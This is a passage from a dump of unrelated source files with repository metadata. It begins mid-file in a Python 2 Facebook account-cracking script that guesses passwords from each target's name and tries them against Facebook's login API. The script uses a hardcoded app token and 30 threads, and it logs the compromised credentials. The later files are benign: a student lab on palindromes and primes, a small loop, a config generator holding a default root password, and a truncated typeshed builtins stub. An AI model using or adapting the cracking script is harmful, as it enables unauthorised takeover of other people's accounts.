pass #Dev:love_hacker
try:
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass1 = b['first_name'] + '12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;91m100% Hack💉\x1b[1;97m-\x1b[1;93m✙\x1b[1;96m-' + user + '-\x1b[1;93m✙\x1b[1;91m-' + pass1
oks.append(user+pass1)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;93mAfter7Days🗝\x1b[1;97m-\x1b[1;93m✙\x1b[1;96m-' + user + '-\x1b[1;93m✙\x1b[1;93m-' + pass1
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass1+"\n")
cek.close()
cekpoint.append(user+pass1)
else:
pass2 = b['last_name'] + '12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;91m100% Hack💉\x1b[1;97m-\x1b[1;93m✙\x1b[1;96m-' + user + '-\x1b[1;93m✙\x1b[1;91m-' + pass2
oks.append(user+pass2)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;93mAfter7Days🗝\x1b[1;97m-\x1b[1;93m✙\x1b[1;96m-' + user + '-\x1b[1;93m✙\x1b[1;93m-' + pass2
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass2+"\n")
cek.close()
cekpoint.append(user+pass2)
else:
pass3 = b['first_name'] +'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;91m100% Hack💉\x1b[1;97m-\x1b[1;94m✙\x1b[1;97m-' + user + '-\x1b[1;93m✙\x1b[1;91m-' + pass3
oks.append(user+pass3)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;93mAfter7Days🗝\x1b[1;97m-\x1b[1;93m✙\x1b[1;96m-' + user + '-\x1b[1;93m✙\x1b[1;93m-' + pass3
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass3+"\n")
cek.close()
cekpoint.append(user+pass3)
else:
pass4 = b['last_name'] + '123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;91m100% Hack💉\x1b[1;97m-\x1b[1;94m✙\x1b[1;96m-' + user + '-\x1b[1;93m✙\x1b[1;91m-' + pass4
oks.append(user+pass4)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;93mAfter7Days🗝\x1b[1;97m-\x1b[1;93m✙\x1b[1;96m-' + user + '-\x1b[1;93m✙\x1b[1;93m-' + pass4
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass4+"\n")
cek.close()
cekpoint.append(user+pass4)
else:
pass5 = b['last_name'] + b['last_name']
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;91m100% Hack💉\x1b[1;97m-\x1b[1;93m✙\x1b[1;96m-' + user + '-\x1b[1;93m✙\x1b[1;91m-' + pass5
oks.append(user+pass5)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;93mAfter7Days🗝\x1b[1;97m-\x1b[1;93m✙\x1b[1;96m-' + user + '-\x1b[1;93m✙\x1b[1;93m-' + pass5
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass5+"\n")
cek.close()
cekpoint.append(user+pass5)
else:
pass6 = b['last_name'] + b['last_name'] + '123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;91m100% Hack💉\x1b[1;97m-\x1b[1;93m✙\x1b[1;96m-' + user + '-\x1b[1;93m✙\x1b[1;91m-' + pass6
oks.append(user+pass6)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;93mAfter7Days🗝\x1b[1;97m-\x1b[1;93m✙\x1b[1;96m-' + user + '-\x1b[1;93m✙\x1b[1;93m-' + pass6
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass6+"\n")
cek.close()
cekpoint.append(user+pass6)
else:
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass7 = b['first_name'] + '12'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;91m100% Hack💉\x1b[1;97m-\x1b[1;93m✙\x1b[1;96m-' + user + '-\x1b[1;93m✙\x1b[1;91m-' + pass7
oks.append(user+pass7)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;93mAfter7Days🗝\x1b[1;97m-\x1b[1;93m✙\x1b[1;96m-' + user + '-\x1b[1;93m✙\x1b[1;93m-' + pass7
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass7+"\n")
cek.close()
cekpoint.append(user+pass7)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print "\033[1;91m•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬•◈•\033[1;93mKali.Linux\033[1;91m•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬•◈•"
print " \033[1;93m«---•◈•---Developed By love-Hacker--•◈•---»" #Dev:love_hacker
print '\033[1;91m✅Process Has Been Completed Press➡ Ctrl+Z.↩ Next Type (python2 World.py)↩\033[1;92m....'
print"\033[1;91mTotal OK/\x1b[1;93mCP \033[1;91m: \033[1;91m"+str(len(oks))+"\033[1;97m/\033[1;95m"+str(len(cekpoint))
print """
╔══╗░░░░╔╦╗░░╔═════╗ harshu
║╚═╬════╬╣╠═╗║░▀░▀░║ indian
╠═╗║╔╗╔╗║║║╩╣║╚═══╝║ WhatsApp
╚══╩╝╚╝╚╩╩╩═╝╚═════╝ xxxxxxxxx
Checkpoint ID Open After 7 Days
•\033[1;91m◈•▬ ▬ ▬ ▬ ▬ ▬ ▬•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬•◈•.
: \033[1;93m .....harshudubey Kali.linux....... \033[1;91m :
•\033[1;91m◈•▬ ▬ ▬ ▬ ▬ ▬ ▬•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬•◈•.'
WhatsApp Num
\033[1;93m +xxxxxxxxx"""
raw_input("\n\033[1;92m[\033[1;91mBack\033[1;96m]")
menu()
if __name__ == '__main__':
login()
|
[
"noreply@github.com"
] |
noreply@github.com
|
ae98570c90dd3ee5fc9a254f560b3788e9a1a2e9
|
7e15ff5ffc93ffe8aacf3675e82f37ead51843a2
|
/main.py
|
6c9459540d31a451942dc9d8f0834beb4b4d0924
|
[] |
no_license
|
AP-MI-2021/lab-2-ale-stanciu
|
727532fdae7af58d17d90f3540f7f9f410dd1f99
|
5e471fdc5138dea5479658e83c1fbaf856e0b945
|
refs/heads/main
| 2023-08-31T20:06:53.338845
| 2021-10-06T06:37:31
| 2021-10-06T06:37:31
| 411,532,189
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,337
|
py
|
def is_palindrome(n):
"""
determina daca un numar este palindrom
:param n: un numar intreg
:return: True daca este palindrom sau False in caz contrar
"""
cn=n
oglindit=0
while cn!=0:
oglindit=cn%10+oglindit*10
cn=cn//10
if n==oglindit:
return True
return False
def test_is_palindrome():
assert (565) == True
assert (567) == False
def is_prime(n):
"""
determina daca un numar este prim
:param n: Un numar intreg
:return: True, daca n este prim, False in caz contrar
"""
if n<2:
return False
for i in range(2,n//2+1):
if n%i==0:
return False
return True
def is_superprime(n):
"""
determina daca un numar este superprim
:param n: un numar intreg
:return: True, daca n este superprim sau False in caz contrar
"""
while n!=0:
if is_prime(n)!=True:
return False
n=n//10
return True
def test_is_superprime():
assert (73) == True
assert (246) == False
def get_largest_prime_below(n):
"""
gaseste ultimul număr prim mai mic decât un număr dat
:param n: un numar intreg
:return: ultimul număr prim mai mic decât un număr dat
"""
for i in range(n-1, 2, -1):
if is_prime(i)==True:
return i
print("Nu exista un astfel de numar")
def test_get_largest_prime_below():
assert (3) == "Nu exista un astfel de numar"
assert (32) == 31
assert (10) == 7
def main():
shouldRun = True
while shouldRun:
print("1. Determină dacă un număr dat este palindrom.")
print("2. Determină dacă un număr este superprim: dacă toate prefixele sale sunt prime.")
print("3. Găsește ultimul număr prim mai mic decât un număr dat.")
optiune = input("Dati optiunea:")
if optiune == "1":
n = int(input("Dati un numar:"))
print(is_palindrome(n))
elif optiune == "2":
x = int(input("Dati un numar:"))
print(is_superprime(x))
elif optiune == "3":
a = int(input("Dati un numar:"))
print(get_largest_prime_below(a))
elif optiune == "x":
shouldRun = False
else:
print("optiune gresita!")
if __name__ == '__main__':
main()
|
[
"aleestanciu@gmail.com"
] |
aleestanciu@gmail.com
|
206fdb7aee191629e73417be7113cc20964499a7
|
1b1b8ecceb3638719ea2657fa2032304f4ed77be
|
/Week2/Sqrts v.2.py
|
ddc4d6ad0cb66cf9462cef2493c814e7e9448859
|
[] |
no_license
|
IndependentDeveloper1/PyCourse
|
ee649812835f9c153410afe7912dd41616c531bf
|
e807a30ad88d69824f692b0e4eed101de2d5d607
|
refs/heads/master
| 2021-08-27T21:48:50.195313
| 2019-04-23T08:42:58
| 2019-04-23T08:42:58
| 182,575,249
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 103
|
py
|
n = int(input())
num = 1
numSum = 0
while num <= n:
numSum += num * num
num += 1
print(numSum)
|
[
"40405436+IndependentDeveloper1@users.noreply.github.com"
] |
40405436+IndependentDeveloper1@users.noreply.github.com
|
a1b319d7316abd8fab6acf241849f8384c7b2092
|
31fae1d7ae1b3e5326db5935749ce2dd359e3827
|
/malabar/config.py
|
8cbcac8ccba4e2fe44b374cf34ab15582f8eaa48
|
[] |
no_license
|
tomrtc/pyotecmalabar
|
98fb4dde37a5753c6dffcd5eab703e174fb2a706
|
f49f5c8726dee54988d7b511e7f6287044009dec
|
refs/heads/master
| 2021-01-10T20:36:51.114167
| 2015-11-20T17:31:40
| 2015-11-20T17:31:40
| 42,729,090
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,017
|
py
|
import configparser
import click
import os
import pprint as pretty
CONFIGURATION_APPLICATION_PATH = click.get_app_dir('malabar')
CONFIGURATION_FILE_NAME = os.path.join(CONFIGURATION_APPLICATION_PATH,
'configuration.ini')
DEFAULT_GROUP = 'otec'
RSS_DATABASE_FILE_PATH = os.path.join(CONFIGURATION_APPLICATION_PATH,
'rss.db')
OTEC_TEMPLATE_RSS_URI = "http://cdafactory.pqa-collab.fr.alcatel-lucent.com/rss.php"
class OtecCfg:
def __init__(self, sfile, _interpolation):
self.configparser = configparser.ConfigParser(interpolation=_interpolation)
self.configparser.read(sfile)
def getDefaultSettings(self):
return self.getSettings(DEFAULT_GROUP)
def getSettings(self, group):
return self.configparser[group]
def get_configuration(config_file_name, interpolation=None):
return OtecCfg(config_file_name, interpolation)
def create_default_config_file():
genCFG = configparser.ConfigParser(allow_no_value=True,
interpolation=None)
genCFG[DEFAULT_GROUP] = {'; Warning autogenerated file, Must be reviewed': 'WARNING',
'rss-uri': OTEC_TEMPLATE_RSS_URI,
'host': 'bull6-05.fr.alcatel-lucent.com',
'; This should be a comment! ;-)':'Ornot',
'user': 'root',
'password': 'letacla',
'ovf-directory': '/tmp',
'Compression': 'yes'}
genCFG['SystemUnderTest'] = {}
if not os.path.exists(CONFIGURATION_APPLICATION_PATH):
os.makedirs(CONFIGURATION_APPLICATION_PATH)
with open(CONFIGURATION_FILE_NAME, 'w') as configfile:
genCFG.write(configfile)
|
[
"Remy.Tomasetto@alcatel-lucent.com"
] |
Remy.Tomasetto@alcatel-lucent.com
|
a291c7bfaadb64ce0f0f8fe7ff044a54344a7ba5
|
77c8d29caad199fb239133e6267d1b75bd2dfe48
|
/packages/pyright-internal/typeshed-fallback/stdlib/builtins.pyi
|
78b29c5aa7e794980ce9212e92a26b6fbb0c2072
|
[
"MIT",
"LicenseRef-scancode-generic-cla",
"Apache-2.0"
] |
permissive
|
simpoir/pyright
|
9c80e596f99dfd1341a55373a96d8795cb72fb56
|
320a0a2fd31e4ffc69d4bd96d7202bbe8d8cb410
|
refs/heads/master
| 2023-04-18T06:42:16.194352
| 2021-04-29T15:20:19
| 2021-04-29T15:20:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 54,998
|
pyi
|
import sys
import types
from _typeshed import (
AnyPath,
OpenBinaryMode,
OpenBinaryModeReading,
OpenBinaryModeUpdating,
OpenBinaryModeWriting,
OpenTextMode,
ReadableBuffer,
SupportsDivMod,
SupportsKeysAndGetItem,
SupportsLessThan,
SupportsLessThanT,
SupportsRDivMod,
SupportsWrite,
)
from ast import AST, mod
from io import BufferedRandom, BufferedReader, BufferedWriter, FileIO, TextIOWrapper
from types import CodeType, TracebackType
from typing import (
IO,
AbstractSet,
Any,
BinaryIO,
ByteString,
Callable,
Container,
Dict,
FrozenSet,
Generic,
ItemsView,
Iterable,
Iterator,
KeysView,
List,
Mapping,
MutableMapping,
MutableSequence,
MutableSet,
NoReturn,
Optional,
Protocol,
Reversible,
Sequence,
Set,
Sized,
SupportsAbs,
SupportsBytes,
SupportsComplex,
SupportsFloat,
SupportsInt,
SupportsRound,
Tuple,
Type,
TypeVar,
Union,
ValuesView,
overload,
runtime_checkable,
)
from typing_extensions import Literal
if sys.version_info >= (3, 9):
from types import GenericAlias
class _SupportsIndex(Protocol):
def __index__(self) -> int: ...
class _SupportsTrunc(Protocol):
def __trunc__(self) -> int: ...
_T = TypeVar("_T")
_T_co = TypeVar("_T_co", covariant=True)
_T_contra = TypeVar("_T_contra", contravariant=True)
_KT = TypeVar("_KT")
_VT = TypeVar("_VT")
_S = TypeVar("_S")
_T1 = TypeVar("_T1")
_T2 = TypeVar("_T2")
_T3 = TypeVar("_T3")
_T4 = TypeVar("_T4")
_T5 = TypeVar("_T5")
_TT = TypeVar("_TT", bound="type")
_TBE = TypeVar("_TBE", bound="BaseException")
class object:
__doc__: Optional[str]
__dict__: Dict[str, Any]
__slots__: Union[str, Iterable[str]]
__module__: str
__annotations__: Dict[str, Any]
@property
def __class__(self: _T) -> Type[_T]: ...
# Ignore errors about type mismatch between property getter and setter
@__class__.setter
def __class__(self, __type: Type[object]) -> None: ... # type: ignore # noqa: F811
def __init__(self) -> None: ...
def __new__(cls) -> Any: ...
def __setattr__(self, name: str, value: Any) -> None: ...
def __eq__(self, o: object) -> bool: ...
def __ne__(self, o: object) -> bool: ...
def __str__(self) -> str: ...
def __repr__(self) -> str: ...
def __hash__(self) -> int: ...
def __format__(self, format_spec: str) -> str: ...
def __getattribute__(self, name: str) -> Any: ...
def __delattr__(self, name: str) -> None: ...
def __sizeof__(self) -> int: ...
def __reduce__(self) -> Union[str, Tuple[Any, ...]]: ...
def __reduce_ex__(self, protocol: int) -> Union[str, Tuple[Any, ...]]: ...
def __dir__(self) -> Iterable[str]: ...
def __init_subclass__(cls) -> None: ...
class staticmethod(object): # Special, only valid as a decorator.
__func__: Callable[..., Any]
__isabstractmethod__: bool
def __init__(self, f: Callable[..., Any]) -> None: ...
def __new__(cls: Type[_T], *args: Any, **kwargs: Any) -> _T: ...
def __get__(self, obj: _T, type: Optional[Type[_T]] = ...) -> Callable[..., Any]: ...
class classmethod(object): # Special, only valid as a decorator.
__func__: Callable[..., Any]
__isabstractmethod__: bool
def __init__(self, f: Callable[..., Any]) -> None: ...
def __new__(cls: Type[_T], *args: Any, **kwargs: Any) -> _T: ...
def __get__(self, obj: _T, type: Optional[Type[_T]] = ...) -> Callable[..., Any]: ...
class type(object):
__base__: type
__bases__: Tuple[type, ...]
__basicsize__: int
__dict__: Dict[str, Any]
__dictoffset__: int
__flags__: int
__itemsize__: int
__module__: str
__mro__: Tuple[type, ...]
__name__: str
__qualname__: str
__text_signature__: Optional[str]
__weakrefoffset__: int
@overload
def __init__(self, o: object) -> None: ...
@overload
def __init__(self, name: str, bases: Tuple[type, ...], dict: Dict[str, Any], **kwds: Any) -> None: ...
@overload
def __new__(cls, o: object) -> type: ...
@overload
def __new__(cls, name: str, bases: Tuple[type, ...], namespace: Dict[str, Any], **kwds: Any) -> type: ...
def __call__(self, *args: Any, **kwds: Any) -> Any: ...
def __subclasses__(self: _TT) -> List[_TT]: ...
# Note: the documentation doesnt specify what the return type is, the standard
# implementation seems to be returning a list.
def mro(self) -> List[type]: ...
def __instancecheck__(self, instance: Any) -> bool: ...
def __subclasscheck__(self, subclass: type) -> bool: ...
@classmethod
def __prepare__(metacls, __name: str, __bases: Tuple[type, ...], **kwds: Any) -> Mapping[str, Any]: ...
if sys.version_info >= (3, 10):
def __or__(self, t: Any) -> types.Union: ...
class super(object):
@overload
def __init__(self, t: Any, obj: Any) -> None: ...
@overload
def __init__(self, t: Any) -> None: ...
@overload
def __init__(self) -> None: ...
class int:
@overload
def __new__(cls: Type[_T], x: Union[str, bytes, SupportsInt, _SupportsIndex, _SupportsTrunc] = ...) -> _T: ...
@overload
def __new__(cls: Type[_T], x: Union[str, bytes, bytearray], base: int) -> _T: ...
if sys.version_info >= (3, 8):
def as_integer_ratio(self) -> Tuple[int, Literal[1]]: ...
@property
def real(self) -> int: ...
@property
def imag(self) -> int: ...
@property
def numerator(self) -> int: ...
@property
def denominator(self) -> int: ...
def conjugate(self) -> int: ...
def bit_length(self) -> int: ...
def to_bytes(self, length: int, byteorder: str, *, signed: bool = ...) -> bytes: ...
@classmethod
def from_bytes(
cls, bytes: Union[Iterable[int], SupportsBytes], byteorder: str, *, signed: bool = ...
) -> int: ... # TODO buffer object argument
def __add__(self, x: int) -> int: ...
def __sub__(self, x: int) -> int: ...
def __mul__(self, x: int) -> int: ...
def __floordiv__(self, x: int) -> int: ...
def __truediv__(self, x: int) -> float: ...
def __mod__(self, x: int) -> int: ...
def __divmod__(self, x: int) -> Tuple[int, int]: ...
def __radd__(self, x: int) -> int: ...
def __rsub__(self, x: int) -> int: ...
def __rmul__(self, x: int) -> int: ...
def __rfloordiv__(self, x: int) -> int: ...
def __rtruediv__(self, x: int) -> float: ...
def __rmod__(self, x: int) -> int: ...
def __rdivmod__(self, x: int) -> Tuple[int, int]: ...
@overload
def __pow__(self, __x: Literal[2], __modulo: Optional[int] = ...) -> int: ...
@overload
def __pow__(self, __x: int, __modulo: Optional[int] = ...) -> Any: ... # Return type can be int or float, depending on x.
def __rpow__(self, x: int, mod: Optional[int] = ...) -> Any: ...
def __and__(self, n: int) -> int: ...
def __or__(self, n: int) -> int: ...
def __xor__(self, n: int) -> int: ...
def __lshift__(self, n: int) -> int: ...
def __rshift__(self, n: int) -> int: ...
def __rand__(self, n: int) -> int: ...
def __ror__(self, n: int) -> int: ...
def __rxor__(self, n: int) -> int: ...
def __rlshift__(self, n: int) -> int: ...
def __rrshift__(self, n: int) -> int: ...
def __neg__(self) -> int: ...
def __pos__(self) -> int: ...
def __invert__(self) -> int: ...
def __trunc__(self) -> int: ...
def __ceil__(self) -> int: ...
def __floor__(self) -> int: ...
def __round__(self, ndigits: Optional[int] = ...) -> int: ...
def __getnewargs__(self) -> Tuple[int]: ...
def __eq__(self, x: object) -> bool: ...
def __ne__(self, x: object) -> bool: ...
def __lt__(self, x: int) -> bool: ...
def __le__(self, x: int) -> bool: ...
def __gt__(self, x: int) -> bool: ...
def __ge__(self, x: int) -> bool: ...
def __str__(self) -> str: ...
def __float__(self) -> float: ...
def __int__(self) -> int: ...
def __abs__(self) -> int: ...
def __hash__(self) -> int: ...
def __bool__(self) -> bool: ...
def __index__(self) -> int: ...
class float:
def __new__(cls: Type[_T], x: Union[SupportsFloat, _SupportsIndex, str, bytes, bytearray] = ...) -> _T: ...
def as_integer_ratio(self) -> Tuple[int, int]: ...
def hex(self) -> str: ...
def is_integer(self) -> bool: ...
@classmethod
def fromhex(cls, __s: str) -> float: ...
@property
def real(self) -> float: ...
@property
def imag(self) -> float: ...
def conjugate(self) -> float: ...
def __add__(self, x: float) -> float: ...
def __sub__(self, x: float) -> float: ...
def __mul__(self, x: float) -> float: ...
def __floordiv__(self, x: float) -> float: ...
def __truediv__(self, x: float) -> float: ...
def __mod__(self, x: float) -> float: ...
def __divmod__(self, x: float) -> Tuple[float, float]: ...
def __pow__(
self, x: float, mod: None = ...
) -> float: ... # In Python 3, returns complex if self is negative and x is not whole
def __radd__(self, x: float) -> float: ...
def __rsub__(self, x: float) -> float: ...
def __rmul__(self, x: float) -> float: ...
def __rfloordiv__(self, x: float) -> float: ...
def __rtruediv__(self, x: float) -> float: ...
def __rmod__(self, x: float) -> float: ...
def __rdivmod__(self, x: float) -> Tuple[float, float]: ...
def __rpow__(self, x: float, mod: None = ...) -> float: ...
def __getnewargs__(self) -> Tuple[float]: ...
def __trunc__(self) -> int: ...
if sys.version_info >= (3, 9):
def __ceil__(self) -> int: ...
def __floor__(self) -> int: ...
@overload
def __round__(self, ndigits: None = ...) -> int: ...
@overload
def __round__(self, ndigits: int) -> float: ...
def __eq__(self, x: object) -> bool: ...
def __ne__(self, x: object) -> bool: ...
def __lt__(self, x: float) -> bool: ...
def __le__(self, x: float) -> bool: ...
def __gt__(self, x: float) -> bool: ...
def __ge__(self, x: float) -> bool: ...
def __neg__(self) -> float: ...
def __pos__(self) -> float: ...
def __str__(self) -> str: ...
def __int__(self) -> int: ...
def __float__(self) -> float: ...
def __abs__(self) -> float: ...
def __hash__(self) -> int: ...
def __bool__(self) -> bool: ...
class complex:
@overload
def __new__(cls: Type[_T], real: float = ..., imag: float = ...) -> _T: ...
@overload
def __new__(cls: Type[_T], real: Union[str, SupportsComplex, _SupportsIndex]) -> _T: ...
@property
def real(self) -> float: ...
@property
def imag(self) -> float: ...
def conjugate(self) -> complex: ...
def __add__(self, x: complex) -> complex: ...
def __sub__(self, x: complex) -> complex: ...
def __mul__(self, x: complex) -> complex: ...
def __pow__(self, x: complex, mod: None = ...) -> complex: ...
def __truediv__(self, x: complex) -> complex: ...
def __radd__(self, x: complex) -> complex: ...
def __rsub__(self, x: complex) -> complex: ...
def __rmul__(self, x: complex) -> complex: ...
def __rpow__(self, x: complex, mod: None = ...) -> complex: ...
def __rtruediv__(self, x: complex) -> complex: ...
def __eq__(self, x: object) -> bool: ...
def __ne__(self, x: object) -> bool: ...
def __neg__(self) -> complex: ...
def __pos__(self) -> complex: ...
def __str__(self) -> str: ...
def __abs__(self) -> float: ...
def __hash__(self) -> int: ...
def __bool__(self) -> bool: ...
class _FormatMapMapping(Protocol):
def __getitem__(self, __key: str) -> Any: ...
class str(Sequence[str]):
@overload
def __new__(cls: Type[_T], o: object = ...) -> _T: ...
@overload
def __new__(cls: Type[_T], o: bytes, encoding: str = ..., errors: str = ...) -> _T: ...
def capitalize(self) -> str: ...
def casefold(self) -> str: ...
def center(self, __width: int, __fillchar: str = ...) -> str: ...
def count(self, x: str, __start: Optional[int] = ..., __end: Optional[int] = ...) -> int: ...
def encode(self, encoding: str = ..., errors: str = ...) -> bytes: ...
def endswith(
self, __suffix: Union[str, Tuple[str, ...]], __start: Optional[int] = ..., __end: Optional[int] = ...
) -> bool: ...
def expandtabs(self, tabsize: int = ...) -> str: ...
def find(self, __sub: str, __start: Optional[int] = ..., __end: Optional[int] = ...) -> int: ...
def format(self, *args: object, **kwargs: object) -> str: ...
def format_map(self, map: _FormatMapMapping) -> str: ...
def index(self, __sub: str, __start: Optional[int] = ..., __end: Optional[int] = ...) -> int: ...
def isalnum(self) -> bool: ...
def isalpha(self) -> bool: ...
if sys.version_info >= (3, 7):
def isascii(self) -> bool: ...
def isdecimal(self) -> bool: ...
def isdigit(self) -> bool: ...
def isidentifier(self) -> bool: ...
def islower(self) -> bool: ...
def isnumeric(self) -> bool: ...
def isprintable(self) -> bool: ...
def isspace(self) -> bool: ...
def istitle(self) -> bool: ...
def isupper(self) -> bool: ...
def join(self, __iterable: Iterable[str]) -> str: ...
def ljust(self, __width: int, __fillchar: str = ...) -> str: ...
def lower(self) -> str: ...
def lstrip(self, __chars: Optional[str] = ...) -> str: ...
def partition(self, __sep: str) -> Tuple[str, str, str]: ...
def replace(self, __old: str, __new: str, __count: int = ...) -> str: ...
if sys.version_info >= (3, 9):
def removeprefix(self, __prefix: str) -> str: ...
def removesuffix(self, __suffix: str) -> str: ...
def rfind(self, __sub: str, __start: Optional[int] = ..., __end: Optional[int] = ...) -> int: ...
def rindex(self, __sub: str, __start: Optional[int] = ..., __end: Optional[int] = ...) -> int: ...
def rjust(self, __width: int, __fillchar: str = ...) -> str: ...
def rpartition(self, __sep: str) -> Tuple[str, str, str]: ...
def rsplit(self, sep: Optional[str] = ..., maxsplit: int = ...) -> List[str]: ...
def rstrip(self, __chars: Optional[str] = ...) -> str: ...
def split(self, sep: Optional[str] = ..., maxsplit: int = ...) -> List[str]: ...
def splitlines(self, keepends: bool = ...) -> List[str]: ...
def startswith(
self, __prefix: Union[str, Tuple[str, ...]], __start: Optional[int] = ..., __end: Optional[int] = ...
) -> bool: ...
def strip(self, __chars: Optional[str] = ...) -> str: ...
def swapcase(self) -> str: ...
def title(self) -> str: ...
def translate(self, __table: Union[Mapping[int, Union[int, str, None]], Sequence[Union[int, str, None]]]) -> str: ...
def upper(self) -> str: ...
def zfill(self, __width: int) -> str: ...
@staticmethod
@overload
def maketrans(__x: Union[Dict[int, _T], Dict[str, _T], Dict[Union[str, int], _T]]) -> Dict[int, _T]: ...
@staticmethod
@overload
def maketrans(__x: str, __y: str, __z: Optional[str] = ...) -> Dict[int, Union[int, None]]: ...
def __add__(self, s: str) -> str: ...
# Incompatible with Sequence.__contains__
def __contains__(self, o: str) -> bool: ... # type: ignore
def __eq__(self, x: object) -> bool: ...
def __ge__(self, x: str) -> bool: ...
def __getitem__(self, i: Union[int, slice]) -> str: ...
def __gt__(self, x: str) -> bool: ...
def __hash__(self) -> int: ...
def __iter__(self) -> Iterator[str]: ...
def __le__(self, x: str) -> bool: ...
def __len__(self) -> int: ...
def __lt__(self, x: str) -> bool: ...
def __mod__(self, x: Any) -> str: ...
def __mul__(self, n: int) -> str: ...
def __ne__(self, x: object) -> bool: ...
def __repr__(self) -> str: ...
def __rmul__(self, n: int) -> str: ...
def __str__(self) -> str: ...
def __getnewargs__(self) -> Tuple[str]: ...
class bytes(ByteString):
@overload
def __new__(cls: Type[_T], ints: Iterable[int]) -> _T: ...
@overload
def __new__(cls: Type[_T], string: str, encoding: str, errors: str = ...) -> _T: ...
@overload
def __new__(cls: Type[_T], length: int) -> _T: ...
@overload
def __new__(cls: Type[_T]) -> _T: ...
@overload
def __new__(cls: Type[_T], o: SupportsBytes) -> _T: ...
def capitalize(self) -> bytes: ...
def center(self, __width: int, __fillchar: bytes = ...) -> bytes: ...
def count(self, __sub: Union[bytes, int], __start: Optional[int] = ..., __end: Optional[int] = ...) -> int: ...
def decode(self, encoding: str = ..., errors: str = ...) -> str: ...
def endswith(
self, __suffix: Union[bytes, Tuple[bytes, ...]], __start: Optional[int] = ..., __end: Optional[int] = ...
) -> bool: ...
def expandtabs(self, tabsize: int = ...) -> bytes: ...
def find(self, __sub: Union[bytes, int], __start: Optional[int] = ..., __end: Optional[int] = ...) -> int: ...
if sys.version_info >= (3, 8):
def hex(self, sep: Union[str, bytes] = ..., bytes_per_sep: int = ...) -> str: ...
else:
def hex(self) -> str: ...
def index(self, __sub: Union[bytes, int], __start: Optional[int] = ..., __end: Optional[int] = ...) -> int: ...
def isalnum(self) -> bool: ...
def isalpha(self) -> bool: ...
if sys.version_info >= (3, 7):
def isascii(self) -> bool: ...
def isdigit(self) -> bool: ...
def islower(self) -> bool: ...
def isspace(self) -> bool: ...
def istitle(self) -> bool: ...
def isupper(self) -> bool: ...
def join(self, __iterable_of_bytes: Iterable[Union[ByteString, memoryview]]) -> bytes: ...
def ljust(self, __width: int, __fillchar: bytes = ...) -> bytes: ...
def lower(self) -> bytes: ...
def lstrip(self, __bytes: Optional[bytes] = ...) -> bytes: ...
def partition(self, __sep: bytes) -> Tuple[bytes, bytes, bytes]: ...
def replace(self, __old: bytes, __new: bytes, __count: int = ...) -> bytes: ...
if sys.version_info >= (3, 9):
